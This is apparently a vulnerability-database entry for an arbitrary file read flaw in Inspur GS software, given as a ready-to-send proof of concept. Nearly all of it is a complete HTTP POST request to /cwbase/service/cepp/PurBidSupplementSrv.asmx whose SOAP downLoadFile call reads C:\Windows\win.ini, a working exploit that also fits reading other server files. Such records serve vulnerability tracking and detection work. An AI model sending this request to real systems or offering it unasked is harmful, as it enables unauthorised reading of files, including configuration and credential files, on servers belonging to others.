vendor = "浪潮"
name = "浪潮GS PurBidSupplementSrv.asmx任意文件读取"
type = "任意文件读取"
version = "未知"
path = "/cwbase/service/cepp/PurBidSupplementSrv.asmx"
detail = "POST /cwbase/service/cepp/PurBidSupplementSrv.asmx HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Cookie: GSPWebLanguageKey=zh-CN Upgrade-Insecure-Requests: 1 <?xml version=\"1.0\"?> <soap:Envelope xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"> <soap:Body xmlns:m=\"http://tempuri.org/\"> <m:downLoadFile> <m:filePath>C:\\Windows\\win.ini</m:filePath> <m:offset>0</m:offset> </m:downLoadFile> </soap:Body> </soap:Envelope>"
fix = "缺省规则可检出"
date = "0704"
label = "1day"
verifier = "AdySec"
